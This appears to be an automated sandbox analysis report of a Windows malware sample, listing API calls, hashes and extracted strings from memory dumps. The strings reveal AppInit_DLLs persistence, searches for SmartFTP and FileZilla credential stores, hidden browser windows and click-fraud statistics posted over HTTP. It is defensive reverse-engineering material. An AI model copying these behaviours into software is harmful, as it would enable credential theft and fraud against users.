                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: FreeString
                  • String ID: +@
                  • API String ID: 3341692771-3835504741
                  • Opcode ID: 846800c24ea5a5b9ff161930f7f614b8eb87560c1f77c722534116a1327d738e
                  • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                  • Opcode Fuzzy Hash: 846800c24ea5a5b9ff161930f7f614b8eb87560c1f77c722534116a1327d738e
                  • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094E6
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 4d1bc242cb33ba376acabb77e8562130d532cafd4101d87aa7673051eb511c6b
                  • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                  • Opcode Fuzzy Hash: 4d1bc242cb33ba376acabb77e8562130d532cafd4101d87aa7673051eb511c6b
                  • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                  APIs
                  • _memset.LIBCMT ref: 0040A26B
                  • SysAllocString.OLEAUT32(?), ref: 0040A28E
                  • SysAllocString.OLEAUT32(?), ref: 0040A296
                  • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                  • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                    • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                    • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                    • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                    • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                  • String ID: J(@
                  • API String ID: 3143865713-2848800318
                  • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                  • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                  • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?), ref: 00408628
                  • GetLastError.KERNEL32 ref: 0040864A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll), ref: 00408687
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                  • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                  • API String ID: 4026185228-3265104503
                  • Opcode ID: fbb25ce4fb2133be7a5b5419f21f392892fccd3598b8746d09e161acbdde3d5e
                  • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                  • Opcode Fuzzy Hash: fbb25ce4fb2133be7a5b5419f21f392892fccd3598b8746d09e161acbdde3d5e
                  • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409B00
                  • SysAllocString.OLEAUT32(?), ref: 00409B0E
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: AllocString
                  • String ID: </title>$</url>$<title>$<url>
                  • API String ID: 2525500382-2286408829
                  • Opcode ID: 80cffecdc154f3961d55a3c5b79764381f6831437f998c4d45a612bfa985b786
                  • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                  • Opcode Fuzzy Hash: 80cffecdc154f3961d55a3c5b79764381f6831437f998c4d45a612bfa985b786
                  • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710,?,?,00000000,?,004027BD,?,00000001,00000000,?,?), ref: 0040A91C
                  • Sleep.KERNEL32(00002710), ref: 0040AAC1
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040AAE9
                  • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                  Strings
                  • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                  • 0, xrefs: 0040AA5B
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                  • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                  • API String ID: 3713053250-1268808612
                  • Opcode ID: 6c152bde10d2c0b7e91d23641586db00b07026a1695735e24a6cde11216123b9
                  • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                  • Opcode Fuzzy Hash: 6c152bde10d2c0b7e91d23641586db00b07026a1695735e24a6cde11216123b9
                  • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                  APIs
                  • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                  • GetLocalTime.KERNEL32(?), ref: 004074B3
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 3777474486-0
                  • Opcode ID: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                  • Opcode Fuzzy Hash: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                  • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                  • CloseHandle.KERNEL32(?), ref: 00408452
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 1974014688-0
                  • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                  • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                  • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                  • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                  APIs
                  • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                  • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                  • String ID: POST
                  • API String ID: 961146071-1814004025
                  • Opcode ID: b4e0c7fb39f83403c03b5f090b9d6f141d07a3f8a6ffa7c0d9c020d846c222da
                  • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                  • Opcode Fuzzy Hash: b4e0c7fb39f83403c03b5f090b9d6f141d07a3f8a6ffa7c0d9c020d846c222da
                  • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                  Strings
                  • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                  • folder, xrefs: 00405184
                  • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                  • personal favorites, xrefs: 00405176
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: EnvironmentExpandOpenStrings
                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                  • API String ID: 3923277744-821743658
                  • Opcode ID: 9c5624b750c48fe949610555ae12c1d7776d2d53775f7ef2d3d96991cebe07cb
                  • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                  • Opcode Fuzzy Hash: 9c5624b750c48fe949610555ae12c1d7776d2d53775f7ef2d3d96991cebe07cb
                  • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CreateHandleInitializeModuleWindow
                  • String ID: AtlAxWin$Shell.Explorer
                  • API String ID: 950422046-1300462704
                  • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                  • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                  • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                  • CharLowerW.USER32(?), ref: 0040ABA0
                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CharCommandFileLineLowerModuleName
                  • String ID: /updatefile3$netprotdrvss.exe
                  • API String ID: 3118597399-3449771660
                  • Opcode ID: 61670428bc38f3e4eb0be7325e100114f65b6339bc855a7a328cdb887f7470a6
                  • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                  • Opcode Fuzzy Hash: 61670428bc38f3e4eb0be7325e100114f65b6339bc855a7a328cdb887f7470a6
                  • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409FCE
                  • GetTickCount.KERNEL32 ref: 00409FDE
                  • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                  • DispatchMessageW.USER32(?), ref: 0040A009
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                  • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                  • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                  APIs
                  • GetTickCount.KERNEL32 ref: 00409F5B
                  • GetTickCount.KERNEL32 ref: 00409F5F
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                  • DispatchMessageW.USER32(?), ref: 00409F80
                  • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CountMessageTick$DispatchPeekSleep
                  • String ID:
                  • API String ID: 4159783438-0
                  • Opcode ID: d828153fe0bc3cb5942bd1ad65280cd53f53337ade4736ba602ea34c47e1e491
                  • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                  • Opcode Fuzzy Hash: d828153fe0bc3cb5942bd1ad65280cd53f53337ade4736ba602ea34c47e1e491
                  • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                  APIs
                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                    • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                    • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                    • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                  • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                  • SysFreeString.OLEAUT32(?), ref: 0040875A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                  • String ID: http://$+@
                  • API String ID: 147727044-3628382792
                  • Opcode ID: 4747316a717284c04b6d8eaca9f6cad11a4be7da38afbfbb58d184a4dff8615e
                  • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                  • Opcode Fuzzy Hash: 4747316a717284c04b6d8eaca9f6cad11a4be7da38afbfbb58d184a4dff8615e
                  • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                  APIs
                  • SetFilePointer.KERNEL32(?,00000000,00000000,?,UniqueNum,00000000), ref: 00407E09
                  • WriteFile.KERNEL32(00000078,00000064,00000000,00000000), ref: 00407E20
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$CreateModuleNamePointerWrite
                  • String ID: UniqueNum$x
                  • API String ID: 594998759-2399716736
                  • Opcode ID: f714b27ee9317318c4b5ab7fa1cefed36b34d8c85c53bda1d1664fc5573218dc
                  • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                  • Opcode Fuzzy Hash: f714b27ee9317318c4b5ab7fa1cefed36b34d8c85c53bda1d1664fc5573218dc
                  • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: #$&$*filezilla*
                  • API String ID: 3438805939-758400021
                  • Opcode ID: b94badfc80f454930b4c4e7711f3c2cdfa3c780a60e708483a1590b16434435c
                  • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                  • Opcode Fuzzy Hash: b94badfc80f454930b4c4e7711f3c2cdfa3c780a60e708483a1590b16434435c
                  • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
